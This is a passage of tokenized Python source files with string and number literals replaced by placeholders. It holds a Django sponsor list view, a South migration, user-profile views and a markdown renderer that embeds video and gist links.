raw ) <EOL> self . assertIn ( settings . MEDIA_URL , soup . find ( '<STR_LIT>' ) [ '<STR_LIT:src>' ] ) </s>
<s> from django . views . generic import ListView <EOL> from . models import Sponsor <EOL> class SponsorList ( ListView ) : <EOL> model = Sponsor <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def get_queryset ( self ) : <EOL> return Sponsor . objects . select_related ( ) . published ( ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT:description>' , self . gf ( '<STR_LIT>' ) ( blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT:status>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:2> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:200> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( object_id_field = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] , frozen_by_south = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:content>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT:200> , blank = True ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ '<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:file>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:file>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . db import models , transaction <EOL> from mezzanine . core . managers import SearchableManager <EOL> from raspberryio . search . utils import load_search_model_indexes <EOL> class Searchable ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> objects = SearchableManager ( ) <EOL> class Meta ( ) : <EOL> abstract = True <EOL> searchable_models = load_search_model_indexes ( ) </s>
<s> from django . contrib . auth . decorators import login_required <EOL> from django . core . paginator import Paginator , EmptyPage , PageNotAnInteger <EOL> from django . shortcuts import render , get_object_or_404 , redirect <EOL> from actstream import models <EOL> from raspberryio . userprofile . models import Profile <EOL> from django . contrib . auth import login as auth_login <EOL> from django . contrib . messages import info <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . decorators . cache import cache_page <EOL> from django . views . decorators . csrf import csrf_protect <EOL> from mezzanine . utils . models import get_user_model <EOL> from mezzanine . accounts . forms import LoginForm <EOL> from mezzanine . utils . urls import login_redirect <EOL> User = get_user_model ( ) <EOL> @ cache_page ( <NUM_LIT> * <NUM_LIT:30> ) <EOL> @ csrf_protect <EOL> def login ( request , template = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> form = LoginForm ( request . POST or None ) <EOL> if request . method == "<STR_LIT:POST>" and form . is_valid ( ) : <EOL> authenticated_user = form . save ( ) <EOL> info ( request , _ ( "<STR_LIT>" ) ) <EOL> auth_login ( request , authenticated_user ) <EOL> return login_redirect ( request ) <EOL> context = { "<STR_LIT>" : form , "<STR_LIT:title>" : _ ( "<STR_LIT>" ) } <EOL> return render ( request , template , context ) <EOL> def profile_related_list ( request , username , relation ) : <EOL> "<STR_LIT>" <EOL> profile = get_object_or_404 ( Profile , user__username__iexact = username ) <EOL> user = profile . user <EOL> if relation == '<STR_LIT>' : <EOL> related_users = models . followers ( user ) <EOL> elif relation == '<STR_LIT>' : <EOL> related_users = models . following ( user ) <EOL> paginator = Paginator ( related_users , <NUM_LIT:20> ) <EOL> page = request . GET . get ( '<STR_LIT>' ) <EOL> try : <EOL> related_users = paginator . page ( page ) <EOL> except PageNotAnInteger : <EOL> related_users = paginator . page ( <NUM_LIT:1> ) <EOL> except EmptyPage : <EOL> related_users = paginator . page ( paginator . num_pages ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : related_users , <EOL> } ) <EOL> def profile_actions ( request , username ) : <EOL> "<STR_LIT>" <EOL> profile = get_object_or_404 ( Profile , user__username__iexact = username ) <EOL> user = profile . user <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : profile , <EOL> '<STR_LIT>' : models . actor_stream ( user ) , <EOL> } ) <EOL> @ login_required <EOL> def profile_dashboard ( request ) : <EOL> """<STR_LIT>""" <EOL> user = get_object_or_404 ( User , id = request . user . id ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT:user>' : user , <EOL> '<STR_LIT>' : user . get_profile ( ) , <EOL> '<STR_LIT>' : models . user_stream ( user ) , <EOL> } ) <EOL> def profile_users ( request ) : <EOL> """<STR_LIT>""" <EOL> users = User . objects . filter ( is_active = True , profile__isnull = False ) . order_by ( '<STR_LIT:username>' ) <EOL> paginator = Paginator ( users , <NUM_LIT:20> ) <EOL> page = request . GET . get ( '<STR_LIT>' ) <EOL> try : <EOL> users = paginator . page ( page ) <EOL> except PageNotAnInteger : <EOL> users = paginator . page ( <NUM_LIT:1> ) <EOL> except EmptyPage : <EOL> users = paginator . page ( paginator . num_pages ) <EOL> return render ( request , "<STR_LIT>" , { <EOL> '<STR_LIT>' : users <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import datetime <EOL> import misaka as m <EOL> from markupsafe import escape <EOL> from pygments import highlight <EOL> from pygments . lexers import get_lexer_by_name <EOL> from pygments . formatters import HtmlFormatter <EOL> from flask_babel import gettext as _ <EOL> def _iframe ( src , width = <NUM_LIT> , height = <NUM_LIT> , content = None , link = None ) : <EOL> """<STR_LIT>""" <EOL> html = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( width , height , src ) <EOL> if not content : <EOL> return html <EOL> if link : <EOL> content = '<STR_LIT>' % ( link , content ) <EOL> return '<STR_LIT>' % ( <EOL> html , content <EOL> ) <EOL> def youtube ( link ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> return '<STR_LIT>' % match . group ( <NUM_LIT:1> ) <EOL> def vimeo ( link ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> return '<STR_LIT>' % match . group ( <NUM_LIT:1> ) <EOL> def youku ( link ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> return '<STR_LIT>' % match . group ( <NUM_LIT:1> ) <EOL> def gist ( link , content = None ) : <EOL> """<STR_LIT>""" <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , link ) <EOL> if not match : <EOL> return None <EOL> html = '<STR_LIT>' % { '<STR_LIT>' : match . group ( <NUM_LIT:1> ) } <EOL> if not content : <EOL> return html <EOL> return '<STR_LIT>' % ( <EOL> html , content <EOL> ) <EOL> def embed ( link , width = <NUM_LIT> , height = <NUM_LIT> , content = None ) : <EOL> src = youtube ( link ) <EOL> if src : <EOL> return _iframe ( src , width , height , content , link ) <EOL> src = vimeo ( link ) <EOL> if src : <EOL> return _iframe ( src , width , height , content , link ) <EOL> src = youku ( link ) <EOL> if src : <EOL> return _iframe ( src , width , height , content , link ) <EOL> return None <EOL> class BaseRenderer ( m . HtmlRenderer ) : <EOL> def autolink ( self , link , is_email ) : <EOL> if is_email : <EOL> return '<STR_LIT>' % { '<STR_LIT>' : link } <EOL> html = embed ( link ) <EOL> if html : <EOL> return html <EOL> content = link . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return '<STR_LIT>' % ( link , content ) <EOL> def link ( self , link , title , content ) : <EOL> width = <NUM_LIT> <EOL> height = <NUM_LIT> <EOL> if title : <EOL> pattern = r'<STR_LIT>' <EOL> match = re . match ( pattern , title ) <EOL> if match : <EOL> width = match . group ( <NUM_LIT:1> ) <EOL> height = match . group ( <NUM_LIT:2> ) <EOL> html = embed ( link , width , height , content ) <EOL> if html : <EOL> return html <EOL> html = '<STR_LIT>' % link <EOL> if title : <EOL> html = '<STR_LIT>' % ( html , title ) <EOL> html = '<STR_LIT>' % ( html , content ) <EOL> return html <EOL> def image ( self , link , title , alt_text ) : <EOL> html = '<STR_LIT>' % ( link , alt_text ) <EOL> if not title : <EOL> return html <EOL> return '<STR_LIT>' % ( <EOL> html , title <EOL> ) <EOL> def paragraph ( self , content ) : <EOL> pattern = r'<STR_LIT>' <EOL> if re . match ( pattern , content ) : <EOL> return content <EOL> pattern = r'<STR_LIT>' <EOL> if re . match ( pattern , content ) : <EOL> return '<STR_LIT>' % content <EOL> pattern = re . compile ( r'<STR_LIT>' ) <EOL> content = pattern . sub ( r'<STR_LIT>' , content ) <EOL> pattern = re . compile ( r'<STR_LIT>' ) <EOL> content = pattern . sub ( r'<STR_LIT>' , content ) <EOL> return '<STR_LIT>' % content <EOL> def block_quote ( self , content ) : <EOL> pattern = r'<STR_LIT>' <EOL> match = re . search ( pattern , content , re . M | re . U ) <EOL> if not match : <EOL> return '<STR_LIT>' % content <EOL> text = match . group ( <NUM_LIT:1> ) . strip ( ) <EOL> pattern = r'<STR_LIT>' % match . group ( <NUM_LIT:0> ) <EOL> content = re . sub ( pattern , match . group ( <NUM_LIT:2> ) , content ) <EOL> return ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % ( content , text ) <EOL> class HighlightRenderer ( BaseRenderer ) : <EOL> def autolink ( self , link , is_email ) : <EOL> html = gist ( link ) <EOL> if html : <EOL> return html <EOL> return super ( HighlightRenderer , self ) . autolink ( link , is_email ) <EOL> def link ( self , link , title , content ) : <EOL> html = gist ( link , content ) <EOL> if html : <EOL> return html <EOL> return super ( HighlightRenderer , self ) . link ( link , title , content ) <EOL> def block_code ( self , text , lang ) : <EOL> if not lang : <EOL> return u'<STR_LIT>' % escape ( text ) <EOL> inlinestyles = False <EOL> linenos = False <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> inlinestyles = self . _inlinestyles <EOL> if hasattr ( self , '<STR_LIT>' 